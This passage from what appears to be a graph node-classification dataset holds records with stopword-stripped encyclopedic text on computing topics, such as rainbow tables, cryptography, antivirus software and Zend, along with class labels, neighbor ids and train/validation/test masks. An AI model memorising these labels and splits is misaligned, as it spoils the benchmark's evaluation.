    "text": "Element_Anti-Virus:element anti-virus solution9 formerly known element anti-virus antivirus software personal firewall package made software house strayspark lab formerly element software uk llc element anti-virus aimed primarily home use microsoft windows operating systems version 6.0 2012 feature known collective intelligence introduced product use back-end server technology known element software network esnet technology enabled product collects suspicious files sends statistics using md5 patterns central database reviewed commonly due privacy concerns however disabled default technology 'trace made malware origins flag commonly found malicious software client machine via world map version 6.0 2012 personal firewall solution network topology analysis software introduced product along packet tracer analyzer administrative use confirmed company twitter account re-launched website solution9 strayspark replacing element anti-virus one first antimalware solutions use hypervisor means security real operating environment",
    "neighbors": [
      2049,
      7809,
      131,
      1417,
      6797,
      4374,
      1052,
      156,
      2721,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      7983,
      8753,
      6834,
      4403,
      10166,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      4464,
      9713,
      3955,
      6643,
      9341,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 3982,
    "label": 4,
    "text": "Transient-key_cryptography:transient-key cryptography transient-key cryptography form public-key cryptography wherein keypairs generated assigned brief intervals time instead individuals organizations blocks cryptographic data chained time transient-key system private keys used briefly destroyed sometimes nicknamed “ disposable crypto. ” data encrypted private key associated specific time interval irrefutably linked interval making transient-key cryptography particularly useful digital trusted timestamping public-key transient-key systems used generate digital signatures assert given piece data changed since signed similarities end traditional public key system public/private keypair typically assigned individual server organization data signed private key asserts signature came indicated source keypairs persist years time private component must carefully guarded disclosure public-key system anyone access private key counterfeit person digital signature transient-key systems however keypair assigned brief interval time particular person entity data signed specific private key becomes associated specific time date keypair active minutes private key permanently destroyed therefore unlike public-key systems transient-key systems depend upon long-term security private keys transient-key system source time must consistent standard understood senders receivers since local system clock may changed user never used source time instead data digitally signed time value derived universal coordinated time utc accurate within millisecond accordance ansi asc x9.95 standard trusted timestamping whenever time interval transient-key system expires new public/private keypair generated private key previous interval used digitally certify new public key old private key destroyed key-chaining system immediate ancestor blockchain technology vogue today new interval time values obtained trusted third-party source specific moments time interpolated received times using time-biasing method based internal system timer trusted time source obtained running within specified tolerances transient private keys issued case time interval chain terminated fresh one begun old new chains connected network archives enable servers continue verify data integrity time protected data regardless often chain must restarted start times chain interval coupled together form unbroken sequence public keys used following extra security measure requests signatures made interval stored log concatenated appended public key start next interval mechanism makes impossible insert new “ signed events ” interval chain fact independently operating servers cross-certification provide third-party proof validity time interval chain irrefutable evidence consensus current time transient-key cryptographic systems display high byzantine fault tolerance web interconnected cross-certifying servers distributed environment creates widely witnessed chain trust strong strongest link contrast entire hierarchies traditional public key systems compromised single private key exposed individual transient key interval chain cross-certified transient key chains server instances cross-certification server signs server b interval chain signed data interval definition effect private keys server b used sign public keys server diagram server instance cross-certified two server instances blue orange cross-certification requires timestamp interval agree timestamp cross-certifying server within acceptable tolerances user-defined typically hundred milliseconds duration along intervals cross-certifications stored network archive within transient-key network archive logical database stored replicated system enable verification data timestamped signed transient keys map set accessible archives stored within every digital signature created system whenever cross-certifications completed beginning interval archive map updated published servers network interval transient private key used sign data concatenated trusted timestamps authenticity certificates verify data later time receiver accesses persistent public key appropriate time interval public key applied digital signature passed published cryptographic routines unpack hash original data compared fresh hash stored data verify data integrity signature successfully decrypts using particular interval published public key receiver assured signature originated time period decrypted fresh hashes match receiver assured data tampered since transient private key created timestamp signed data transient-key cryptography invented 1997 dr. michael d. doyle eolas technologies inc. later acquired productized proofspace inc protected us patents 6,381,696 7,017,046 7,047,415 7,210,035 included ansi asc x9.95 standard trusted timestamping transient-key cryptography predecessor forward secrecy despite appearance bitcoin blockchain technology derived transient-key cryptography dr. doyle publicly denied satoshi nakamoto",
    "neighbors": [
      9248,
      8674,
      11684,
      7085,
      10831,
      2901,
      1941,
      503,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 3983,
    "label": 5,
    "text": "Streaming_Text_Oriented_Messaging_Protocol:streaming text oriented messaging protocol simple streaming text oriented message protocol stomp formerly known ttmp simple text-based protocol designed working message-oriented middleware mom provides interoperable wire format allows stomp clients talk message broker supporting protocol protocol broadly similar http works tcp using following commands communication client server frame consisting number lines first line contains command followed headers form key value one per line followed blank line body content ending null character communication server client message receipt error frame similar format headers body content mom products support stomp list implementations also maintained stomp web site",
    "neighbors": [
      1280,
      10924,
      142,
      9365,
      9270,
      6522,
      2971,
      3708
    ],
    "mask": "Train"
  },
  {
    "node_id": 3984,
    "label": 4,
    "text": "Rainbow_table:rainbow table rainbow table precomputed table reversing cryptographic hash functions usually cracking password hashes tables usually used recovering password credit card numbers etc certain length consisting limited set characters practical example space–time tradeoff using less computer processing time storage brute-force attack calculates hash every attempt processing time less storage simple lookup table one entry per hash use key derivation function employs salt makes attack infeasible rainbow tables invented philippe oechslin application earlier simpler algorithm martin hellman computer system requires password authentication must contain database passwords either hashed plaintext various methods password storage exist tables vulnerable theft storing plaintext password dangerous databases therefore store cryptographic hash user password database system one – including authentication system – determine user password merely looking value stored database instead user enters password authentication system computes hash value provided password hash value compared stored hash user authentication successful two hashes match gathering password hash using said hash password would fail since authentication system would hash second time learn user password password produces hashed value must found usually brute-force dictionary attack rainbow tables one type tool developed derive password looking hashed value rainbow tables always needed straightforward methods hash reversal available brute-force attacks dictionary attacks straightforward methods available however adequate systems use long passwords difficulty storing options available searching extensive database perform reverse lookup hash address issue scale reverse lookup tables generated stored smaller selection hashes reversed could make long chains passwords although reverse lookup hash chained table takes computational time lookup table much smaller hashes longer passwords stored rainbow tables refinement chaining technique provide solution problem called chain collisions source suppose password hash function h finite set passwords p. goal precompute data structure given output h hash function either locate element p p h p h determine p p. simplest way compute h p p p storing table requires θ |p| n bits space n size output h prohibitive large |p| hash chains technique decreasing space requirement idea define reduction function r maps hash values back values p. note however reduction function actually inverse hash function rather different function swapped domain codomain hash function alternating hash function reduction function chains alternating passwords hash values formed example p set lowercase alphabetic 6-character passwords hash values 32 bits long chain might look like requirement reduction function able return plain text value specific size generate table choose random set initial passwords p compute chains fixed length k one store first last password chain first password called starting point last one called endpoint example chain aaaaaa would starting point kiebgt would endpoint none passwords hash values would stored given hash value h want invert find corresponding password compute chain starting h applying r h r point observe value matching one endpoints table get corresponding starting point use recreate chain good chance chain contain value h immediately preceding value chain password p seek example 're given hash would compute chain first applying r since one endpoints table take corresponding starting password follow chain 920ecf10 reached thus password different password hash value note however chain always contain hash value h may happen chain starting h merges chain different starting point example may given hash value fb107e70 follow chain get kiebgt chain starting aaaaaa called false alarm case ignore match continue extend chain h looking another match chain h gets extended length k good matches password never produced chains table content depend hash value inverted created repeatedly used lookups unmodified increasing length chain decreases size table also increases time required perform lookups time-memory trade-off rainbow table simple case one-item chains lookup fast table big chains get longer lookup slows table size goes simple hash chains several flaws serious point two chains collide produce value merge consequently table cover many passwords despite paid computational cost generate previous chains stored entirety impossible detect efficiently example third value chain 3 matches second value chain 7 two chains cover almost sequence values final values hash function h unlikely produce collisions usually considered important security feature reduction function r need correctly cover likely plaintexts collision resistant difficulties result importance choosing correct function r. picking r identity little better brute force approach attacker good idea likely plaintexts choose function r makes sure time space used likely plaintexts entire space possible passwords effect r shepherds results prior hash calculations back likely plaintexts benefit comes drawback r likely wo n't produce every possible plaintext class attacker wishes check denying certainty attacker passwords came chosen class also difficult design function r match expected distribution plaintexts rainbow tables effectively solve problem collisions ordinary hash chains replacing single reduction function r sequence related reduction functions r r. way two chains collide merge must hit value iteration consequently final values chain identical final postprocessing pass sort chains table remove duplicate chains final value chains new chains generated fill table chains collision-free may overlap briefly merge drastically reducing overall number collisions using sequences reduction functions changes lookup done hash value interest may found location chain necessary generate k different chains first chain assumes hash value last hash position applies r next chain assumes hash value second-to-last hash position applies r h r last chain applies reduction functions alternating h. creates new way producing false alarm guess position hash value wrong may needlessly evaluate chain although rainbow tables follow chains make fewer tables simple hash chain tables grow beyond certain size without rapidly becoming inefficient due merging chains deal maintain multiple tables lookup must search table rainbow tables achieve similar performance tables k times larger allowing perform factor k fewer lookups rainbow tables use refined algorithm different reduction function link chain hash collision two chains chains merge long collision n't occur position chain increases probability correct crack given table size cost squaring number steps required per lookup lookup routine also needs iterate index first reduction function used chain rainbow tables specific hash function created e.g. md5 tables crack md5 hashes theory technique invented philippe oechslin fast form time/memory tradeoff implemented windows password cracker ophcrack powerful rainbowcrack program later developed generate use rainbow tables variety character sets hashing algorithms including lm hash md5 sha-1 simple case reduction function hash function collision given complete rainbow table one makes sure find corresponding password given hash size password set p time needed compute table length table l average time needed find password matching given hash directly related thus 8-character lowercase alphanumeric passwords case p ≃ 3×10 would easily tractable personal computer 16-character lowercase alphanumeric passwords case p ≃ 10 would completely intractable rainbow table ineffective one-way hashes include large salts example consider password hash generated using following function || concatenation operator codice_1 codice_2 salt value secret may generated random stored password hash large salt value prevents precomputation attacks including rainbow tables ensuring user password hashed uniquely means two users password different password hashes assuming different salts used order succeed attacker needs precompute tables possible salt value salt must large enough otherwise attacker make table salt value older unix passwords used 12-bit salt would require 4096 tables significant increase cost attacker impractical terabyte hard drives sha2-crypt bcrypt methods—used linux bsd unixes solaris—have salts 128 bits larger salt values make precomputation attacks systems infeasible almost length password even attacker could generate million tables per second would still need billions years generate tables possible salts another technique helps prevent precomputation attacks key stretching stretching used salt password intermediate hash values run underlying hash function multiple times increase computation time required hash password instance md5-crypt uses 1000 iteration loop repeatedly feeds salt password current intermediate hash value back underlying md5 hash function user password hash concatenation salt value secret final hash extra time noticeable users wait fraction second time log hand stretching reduces effectiveness brute-force attacks proportion number iterations reduces number attempts attacker perform given time frame principle applied md5-crypt bcrypt also greatly increases time needed build precomputed table absence salt needs done alternative approach called key strengthening extends key random salt unlike key stretching securely deletes salt forces attacker legitimate users perform brute-force search salt value although paper introduced key stretching referred earlier technique intentionally chose different name term key strengthening often arguably incorrectly used refer key stretching rainbow tables precomputation attacks work passwords contain symbols outside range presupposed longer precomputed attacker however tables generated take account common ways users attempt choose secure passwords adding number special character sizable investment computing processing rainbow tables beyond fourteen places length yet common choosing password longer fourteen characters may force attacker resort brute-force methods specific intensive efforts focused lm hash older hash algorithm used microsoft publicly available lm hash particularly vulnerable passwords longer 7 characters broken two sections hashed separately choosing password fifteen characters longer guarantees lm hash generated nearly distributions variations unix linux bsd use hashes salts though many applications use hash typically md5 salt microsoft windows nt/2000 family uses lan manager nt lan manager hashing method based md4 also unsalted makes one popularly generated tables",
    "neighbors": [
      7426,
      6916,
      7556,
      7557,
      11144,
      6797,
      1941,
      3477,
      10135,
      2714,
      1315,
      4389,
      6954,
      2357,
      6905,
      823,
      5433,
      1978,
      8513,
      9170,
      1114,
      10332,
      8671,
      8674,
      9186,
      5492,
      11639,
      7160,
      1785,
      10107,
      2430
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3985,
    "label": 1,
    "text": "Islamic_World_Science_Citation_Database:islamic world science citation database islamic world science citation database isc citation index established iranian ministry science research technology approved organisation islamic conference indexes journals islamic world announced baku azerbaijan fourth islamic conference ministers higher education scientific research held october 2008 managed islamic world science citation center located shiraz 2009 isc partnered scopus allows isc publications indexed scopus",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3986,
    "label": 9,
    "text": "Zend_Technologies:zend technologies zend technologies ltd. world wide web infrastructure software company headquarters cupertino california u.s. technology center ramat gan tel aviv israel offices france italy germany company operations currently centered development products relating development deployment management php-based web applications including zend studio zend technologies founded andi gutmans zeev suraski along israeli graduates technion developed php initial creation rasmus lerdorf name zend combination suraski gutmans forenames zeev andi 1997 gutmans suraski rewrote parser php-fi originally written lerdorf resulting php 3 1998 redesigned parser completely named zend engine php 4 based first version zend engine 1999 company zend technologies formally established received initial funding israeli venture capital funds platinum neurone ventures walden israel doron gerstel experienced business executive recruited head company ceo 2000 jim jagielski hired cto us operations july 2004 zend technologies raised 8m series c funding established headquarters usa january 2005 intel capital sapphire ventures formerly sap ventures joined existing investors zend technologies june 2006 zend technologies received best startup software company award israeli venture association annual hi tech conference tel aviv award presented israeli prime minister ehud olmert august 2006 zend raised 20 million series funding february 2009 zend co-founder andi gutmans appointed chief executive officer previously serving company vp research development zend also recruited mark burton previously served evp worldwide sales mysql executive chairman october 2015 rogue wave software acquired zend shortly acquired co-founder andi gutmans left company february 2016 zend server web application server running managing php applications zend server comes built-in application monitoring application problem diagnostics caching optimization capabilities web-based administrator console zend server ’ installers native os rpm/deb/msi include tested php distribution zend framework out-of-the-box connectivity common databases java connectivity scalable php-integrated download server linux community edition zend server free complete php stack advertised company suited developing php applications running non-critical applications production zend server community edition supported linux windows iseries i5/os mac os x periodically updated zend starting zend server 7.0 free edition discontinued available paid upgrade zend platform product runs web server monitoring php applications reporting performance possible problems also offers php accelerator often confused free zend optimizer content caching solution including api partial page caching session clustering numerous management tools zend platform used conjunction zend studio remote debugging profiling php applications native server environment zend studio commercial proprietary integrated development environment ide php 2013 along zend server deployed 40,000 companies zend guard product prevent peeping php scripts zend also provides php certification test certifies people succeeding exam zend certified php engineers zce confused zend framework certification intended prove person fully qualified develop php web applications 10,000 zend certified engineers world either php 4 php 5 php 5.3 certifications help zend certified engineers gain employment zend lists persons passed zend php certification exam directory yellow pages php professionals also allow zces place zce logo personal web site/resume php mainly used web development language zce tests candidate variety skills necessary developing web applications php 5 certification exam covers although study guide contents topics consider order prepared exam use new extension php data object pdo layer access databases standard php library spl new set classes specially created manipulate objects sets arrays files zend considers required score pass test confidential well questions inform failing candidates topics made fail known candidates must pass every topic pass test whole believed required score per topic might 75–85 passing zend certification test every candidate gets listing zend certified directory lifetime free enables recruiters hire qualified certified php engineers zend engine heart php originally written andi gutmans zeev suraski first version zend engine shipped php4 zend sponsors developers actively contribute engine main development zend engine today comes contributors php project zend framework open-source object-oriented web application framework written php5 licensed new bsd license simple cloud api open-source php api accessing services multiple cloud vendors configuration changes alone project first project zend launched facilitate php development cloud apigility api builder designed simplify creation maintenance apis zend technologies visits events worldwide spread oss message 2005 zeev suraski delivered speech oss technical seminar organized open standard support organization sunwah pearl linux hong kong trade development council",
    "neighbors": [
      2465,
      3553,
      899,
      2372,
      4997,
      4198,
      8644,
      10020,
      10413,
      7022,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 3987,
    "label": 0,
    "text": "Russell_Gray:russell gray russell david gray evolutionary biologist psychologist working applying quantitative methods study cultural evolution human prehistory worked professor university auckland located new zealand although originally trained biology psychology gray become well known studies evolution austronesian language family using computational phylogenetic methods gray also performs research animal cognition one main research-projects studies tool-use among new caledonian crows summer 2014 max planck society announced max planck institute economics jena germany would receive new different mandate along johannes krause gray appointed director new max planck institute science human history commencing february 1 2014",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3988,
    "label": 8,
    "text": "Template_Toolkit:template toolkit template toolkit tt template engine used primarily building web sites also suitable creating type digital document pdf latex file template toolkit based mini-language allow direct perl templates default unlike competing products e.g mason forces developers separate business logic perl libraries leaving presentation logic templates written perl popular accessories c. released free software licence perl artistic licence gpl tt used templating system various perl application frameworks including catalyst mvc framework cgi :application maypole framework template toolkit written andy wardley prototype tt text :metatext perl module released 1996 first version tt proper released 1999 version 2.00 released 2001 version 3 development last touched january 2010",
    "neighbors": [
      5249,
      5253,
      8582,
      10276,
      6313,
      1837,
      4398,
      8627,
      9014,
      4294,
      9926,
      7764,
      11610,
      7518,
      11492,
      2281,
      8941,
      2804,
      3837
    ],
    "mask": "None"
  },
  {
    "node_id": 3989,
    "label": 7,
    "text": "ClearSlide:clearslide clearslide saas-based sales engagement platform lets users share content sales materials via email links viewer ’ link ‘ live pitch ’ clearslide designed sales marketing teams accessible primarily via annual subscription model users also sign limited time free trial software full access features regular subscription company ’ headquarters san francisco ’ financial district clearslide found october 2009 funded founders initial subscribers company fundraise year following launch august 2012 clearslide raised 28 million series b round financing announcing fuel rapid growth expansion plans march 5 2013 company bought sliderocket vmware second acquisition announced july 2 2013 clearslide bought crunched rival cloud-based sales engagement platform february 2014 clearslide raised 50 million series c funding partnership social+capital partnership led additional contributions greylock partners bessemer venture partners felicis ventures",
    "neighbors": [
      6153
    ],
    "mask": "Test"
  },
  {
    "node_id": 3990,
    "label": 9,
    "text": "Thread-local_storage:thread-local storage thread-local storage tls computer programming method uses static global memory local thread use global variables generally discouraged modern programming legacy operating systems unix designed uniprocessor hardware require additional mechanism retain semantics pre-reentrant apis example situations functions use global variable set error condition example global variable codice_1 used many functions c library codice_1 global variable call system function one thread may overwrite value previously set call system function different thread possibly following code different thread could check error condition solution codice_1 variable looks like global fact exists per thread—i.e. lives thread-local storage second use case would multiple threads accumulating information global variable avoid race condition every access global variable would protected mutex alternatively thread might accumulate thread-local variable definition read written threads implying race conditions threads synchronise final accumulation thread-local variable single truly global variable many systems impose restrictions size thread-local memory block fact often rather tight limits hand system provide least memory address pointer sized variable thread-local allows use arbitrarily sized memory blocks thread-local manner allocating memory block dynamically storing memory address block thread-local variable application programming interface api function codice_4 used obtain unused tls slot index tls slot index considered ‘ used ’ codice_5 codice_6 functions used read write memory address thread-local variable identified tls slot index codice_6 affects variable current thread codice_8 function called release tls slot index win32 thread information block thread one entries block thread-local storage table thread tlsalloc returns index table unique per address space call thread copy thread-local storage table hence thread independently use tlssetvalue index obtain specified value via tlsgetvalue index set look entry thread table apart tlsxxx function family windows executables define section mapped different page thread executing process unlike tlsxxx values pages contain arbitrary valid addresses addresses however different executing thread therefore passed asynchronous functions may execute different thread otherwise passed code assume virtual address unique within whole process tls sections managed using memory paging size quantized page size 4kb x86 machines sections may defined inside main executable program dlls contain sections correctly initialized loading loadlibrary pthreads api memory local thread designated term thread-specific data functions codice_9 codice_10 used respectively create delete key thread-specific data type key explicitly left opaque referred codice_11 key seen threads thread key associated thread-specific data via codice_12 data later retrieved using codice_13 addition codice_9 optionally accept destructor function automatically called thread exit thread-specific data null destructor receives value associated key parameter perform cleanup actions close connections free memory etc. even destructor specified program must still call codice_10 free thread-specific data process level destructor frees data local thread apart relying programmers call appropriate api functions also possible extend programming language support thread local storage tls c11 keyword codice_16 used define thread-local variables header codice_17 supported defines codice_18 synonym keyword example usage c++11 introduces codice_18 keyword used following cases aside various compiler implementations provide specific ways declare thread-local variables windows versions vista server 2008 codice_23 works dlls dlls bound executable work loaded loadlibrary protection fault data corruption may occur common lisp provides feature called dynamically scoped variables dynamic variables binding private invocation function children called function abstraction naturally maps thread-specific storage lisp implementations provide threads common lisp numerous standard dynamic variables threads sensibly added implementation language without variables thread-local semantics dynamic binding instance standard variable codice_24 determines default radix integers printed variable overridden enclosing code print integers alternate radix functions execute concurrently different threads binding properly thread-local otherwise thread fight controls global printing radix version 2 static global variables thread-local default declared syntax similar normal global static variables languages global variables must explicitly requested using shared keyword shared keyword works storage class type qualifier – shared variables subject restrictions statically enforce data integrity declare classic global variable without restrictions unsafe __gshared keyword must used java thread-local variables implemented class object threadlocal holds variable type accessible via get/set methods example threadlocal variable holding integer value looks like least oracle/openjdk use native thread-local storage spite os threads used aspects java threading instead thread object stores non-thread-safe map threadlocal objects values opposed threadlocal map thread objects values incurring performance overhead .net framework languages c static fields marked threadstatic attribute .net 4.0 system.threading.threadlocal class available allocating lazily loading thread-local variables also api available dynamically allocating thread-local variables object pascal delphi free pascal threadvar reserved keyword used instead 'var declare variables using thread-local storage cocoa gnustep openstep nsthread object thread-local dictionary accessed thread threaddictionary method perl threads added late evolution language large body extant code already present comprehensive perl archive network cpan thus threads perl default take local storage variables minimise impact threads extant non-thread-aware code perl thread-shared variable created using attribute python programming language |python version 2.4 later local class threading module used create thread-local storage ruby programming language |ruby create/access thread-local variables using =/ methods category threads computing category variable computer science category software design patterns",
    "neighbors": [
      1152,
      1280,
      8582,
      7175,
      1801,
      5257,
      4107,
      5772,
      7307,
      2062,
      9225,
      10510,
      3733,
      2456,
      9245,
      5663,
      5537,
      8100,
      6184,
      5165,
      2222,
      5677,
      8640,
      8266,
      333,
      11343,
      5840,
      337,
      4817,
      7760,
      6868,
      9425,
      10581,
      2011,
      734,
      8928,
      8929,
      4194,
      2281,
      8554,
      5357,
      8303,
      4592,
      8304,
      3573,
      1142,
      5754,
      2556,
      2045,
      4734
    ],
    "mask": "Test"
  },
  {
    "node_id": 3991,
    "label": 4,
    "text": "Scunthorpe_problem:scunthorpe problem scunthorpe problem unintentional blocking websites e-mails forum posts search results spam filter search engine text contains string letters appear obscene otherwise unacceptable meaning names abbreviations technical terms often cited affected issue problem arises since computers easily identify strings text within document interpreting words kind requires considerable ability interpret wide range contexts possibly across many cultures extremely difficult task result broad blocking rules may result false positives affecting innocent phrases problem named incident 1996 aol profanity filter prevented residents town scunthorpe north lincolnshire england creating accounts aol town name contains substring cunt years later google opt-in safesearch filters apparently made mistake preventing residents searching local businesses included scunthorpe names mistaken decisions obscenity filters include",
    "neighbors": [
      3462,
      488,
      6762,
      7627,
      7541,
      7739,
      8735
    ],
    "mask": "None"
  },
  {
    "node_id": 3992,
    "label": 3,
    "text": "Socket_604:socket 604 socket 604 604-pin microprocessor socket designed interface intel xeon processor rest computer provides electrical interface well physical support socket designed support heatsink socket 604 designed intel zero insertion force socket intended workstations server platforms socket contains 604 pins 603 electrical contacts last dummy pin contact 1.27mm pitch regular pin array mate 604-pin processor package socket 604 processors utilize bus speed either 400 533 667 800 1066 mhz manufactured either 130 90 65 45 nm process socket 604 processors inserted socket 603 designed motherboards due one additional pin present socket 603 processors inserted socket 604 designed motherboards since extra pin slot anything 603 cpu socket 604 processors range 1.60 ghz 3.80 ghz higher clock rates found among older slower netburst-based xeons following intel xeon chipsets used socket 604 late socket 604 revivals",
    "neighbors": [
      3588,
      5901,
      5523,
      4246,
      2455,
      3352,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      7657,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 3993,
    "label": 7,
    "text": "Elasticity_(cloud_computing):elasticity cloud computing cloud computing elasticity defined degree system able adapt workload changes provisioning de-provisioning resources autonomic manner point time available resources match current demand closely possible elasticity defining characteristic differentiates cloud computing previously proposed computing paradigms grid computing dynamic adaptation capacity e.g. altering use computing resources meet varying workload called elastic computing let us illustrate elasticity simple example service provider wants run website iaas cloud moment formula_1 website unpopular single machine commonly virtual machine sufficient serve web users moment formula_2 website suddenly becomes popular example result flash crowd single machine longer sufficient serve users based number web users simultaneously accessing website resource requirements web server might ten machines needed elastic system immediately detect condition provision nine additional machines cloud serve web users responsively time formula_3 website becomes unpopular ten machines currently allocated website mostly idle single machine would sufficient serve users accessing website elastic system immediately detect condition deprovision nine machines release cloud elasticity aims matching amount resource allocated service amount resource actually requires avoiding over- under-provisioning over-provisioning i.e. allocating resources required avoided service provider often pay resources allocated service example amazon ec2 m4 extra-large instance costs us 0.239/hour service allocated two virtual machines one required service provider wastes 2,095 every year hence service provider expenses higher optimal profit reduced under-provisioning i.e. allocating fewer resources required must avoided otherwise service serve users good service example under-provisioning website may make seem slow unreachable web users eventually give accessing thus service provider loses customers long term provider income decrease also reduces profit one potential problem elasticity takes time cloud virtual machine vm acquired time user however may take several minutes acquired vm ready use vm startup time dependent factors image size vm type data center location number vms etc cloud providers different vm startup performance implies control mechanism designed elastic applications must consider decision process time needed elasticity actions take effect provisioning another vm specific application component elastic applications allocate deallocate resources vms demand specific application components makes cloud resources volatile traditional monitoring tools associate monitoring data particular resource i.e vm ganglia nagios longer suitable monitoring behavior elastic applications example lifetime data storage tier elastic application might add remove data storage vms due cost performance requirements varying number used vms thus additional information needed monitoring elastic applications associating logical application structure underlying virtual infrastructure turn generates problems aggregate data multiple vms towards extracting behavior application component running top vms different metrics might need aggregated differently e.g. cpu usage could averaged network transfer might summed deploying applications cloud infrastructures iaas/paas requirements stakeholder need considered order ensure proper elasticity behavior even though traditionally one would try find optimal trade-off cost quality performance real world cloud users requirements regarding behavior complex target multiple dimensions elasticity e.g. sybl cloud applications varying types complexities multiple levels artifacts deployed layers controlling structures must take consideration variety issues approach sense rsybl multi-level control control systems need consider impact lower level control upon higher level ones vice versa e.g. controlling virtual machines web containers web services time well conflicts may appear various control strategies various levels elastic strategies clouds take advantage control-theoretic methods e.g. predictive control experimented cloud scenarios showing considerable advantages respect reactive methods",
    "neighbors": [
      225,
      4194,
      8962,
      5956,
      5958,
      1935,
      7537,
      9974,
      1211
    ],
    "mask": "None"
  },
  {
    "node_id": 3994,
    "label": 4,
    "text": "Center_for_Internet_Security:center internet security nowiki /nowiki center internet security cis 501 c 3 nonprofit organization formed october 2000 mission identify develop validate promote sustain best practice solutions cyber defense build lead communities enable environment trust cyberspace organization headquartered east greenbush new york members including large corporations government agencies academic institutions cis employs closed crowdsourcing model identify refine effective security measures individuals developing recommendations shared community evaluation consensus decision-making process national international level cis plays important role forming security policies decisions maintaining cis controls cis benchmarks hosting multi-state information sharing analysis center ms-isac cis several program areas including ms-isac cis controls cis benchmarks cis communities cis cybermarket program areas cis works wide range entities including academia government private sector general public increase online security providing products services improve security efficiency effectiveness multi-state information sharing analysis center ms-isac round-the-clock cyber threat monitoring mitigation center state local governments operated cis partnership office cybersecurity communications united states department homeland security dhs ms-isac established late 2002 officially launched january 2003 william f. pelgrin chief security officer state new york beginning small group participating states northeast ms-isac came include 50 u.s. states district columbia well u.s. territorial tribal local governments order facilitate expanding scope late 2010 ms-isac transitioned not-for-profit status auspices center internet security transition facilitated cis established reputation providing cybersecurity resources public private sectors ms-isac helps government agencies combat cyberthreats works closely federal law enforcement designated dhs key cyber security resource nation state local territorial tribal sltt governments ms-isac 24x7 cyber security operations center performs network monitoring issues early cyber threat warnings advisories performs vulnerability identification mitigation well incident response main objectives ms-isac described follows elections infrastructure information sharing analysis center ei-isac established election infrastructure subsector government coordinating council gcc critical resource cyber threat prevention protection response recovery nation ’ state local territorial tribal sltt election offices ei-isac operated center internet security inc mission ei-isac improve overall cybersecurity posture sltt election offices collaboration information sharing among members u.s. department homeland security dhs federal partners private sector partners keys success ei-isac provides central resource gathering information cyber threats election infrastructure two-way sharing information among public private sectors order identify protect detect respond recover attacks public private election infrastructure ei-isac comprises representatives sltt election offices contractors supporting sltt election infrastructure cis controls cis benchmarks provide global standards internet security recognized global standard best practices securing systems data attacks cis maintains cis controls popular set 20 security controls map many compliance standards applicable internet things independent consensus process cis benchmarks provide frameworks help organizations bolster security cis offers variety free resources include secure configuration benchmarks automated configuration assessment tools content security metrics security software product certifications cis controls advocate defense-in-depth model help prevent detect malware may 2017 study showed average organizations fail 55 compliance checks established center internet security half violations high severity issues march 2015 cis launched cis hardened images amazon web services response growing concern surrounding data safety information housed virtual servers cloud resources made available amazon machine images six cis benchmarks-hardened systems including microsoft windows linux ubuntu additional images cloud providers added later cis released companion guides cis controls recommendations actions counter cybersecurity attacks new guides released october december 2015 april 2018 cis launched information security risk assessment method implement cis controls called cis ram based upon risk assessment standard docra council cis benchmarks collaboration consensus community cis securesuite members class cis members access additional sets tools resources consensus community made experts field security use knowledge experience help global internet community cis securesuite members made several different types companies ranging size including government agencies colleges universities nonprofits auditors consultants security software vendors organizations cis benchmarks tools cis provides cost allow workers create reports compares system security universal consensus standard fosters new structure internet security everyone accountable shared top executives technology professionals internet users throughout globe cis provides internet security tools scoring feature rates configuration security system hand example cis provides securesuite members access cis-cat pro cross-platform java app scans target systems produces report comparing settings published benchmarks intended encourage motivate users improve scores given software bolsters security internet systems universal consensus standard cis employs draws upon uses accumulated knowledge skillful technology professionals since internet security professionals volunteer contributing consensus reduces costs cis makes cost effective cis cybermarket collaborative purchasing program serves u.s. state local tribal territorial sltt government organizations nonprofit entities public health education institutions improve cybersecurity cost-effective group procurement intent cis cybermarket combine purchasing power governmental nonprofit sectors help participants improve cybersecurity condition lower cost would able attain program assists time intensive costly complex daunting task maintaining cybersecurity working public private sectors bring partners cost-effective tools services combined purchasing opportunities reviewed domain experts three main objectives cis cybermarket cis cybermarket like ms-isac serves government entities non-profits achieving greater cyber security resources page multiple newsletters documents available free charge including cybersecurity handbook cities counties cis communities volunteer global community professionals continuously refine verify cis best practices cybersecurity tools develop structure benchmarks cis uses strategy members organization first form teams teams collect suggestions advice official work recommendations participating organizations teams analyze data information determine vital configuration settings would improve internet system security many work settings possible member team constantly works teammates critically analyzes critiques rough draft consensus forms among team benchmark released general public available download testing among community reviewing feedback testing making necessary adjustments changes final benchmark relevant security tools made available public download cis website process extensive carefully executed thousands security professionals across globe participate according isaca development cis benchmark sun microsystems solaris 2,500 users downloaded benchmark monitoring tools organizations participated founding cis october 2000 include isaca american institute certified public accountants aicpa institute internal auditors iia international information systems security certification consortium isc2 sans institute system administration networking security cis since grown hundreds members varying degrees membership cooperates works variety organizations members national international levels organizations include public private sectors government isacs law enforcement",
    "neighbors": [
      9665,
      2084,
      2628,
      326,
      2343,
      4936,
      1897,
      8613,
      10437,
      6797,
      7248,
      2865,
      823,
      9049,
      10717
    ],
    "mask": "Test"
  },
  {
    "node_id": 3995,
    "label": 3,
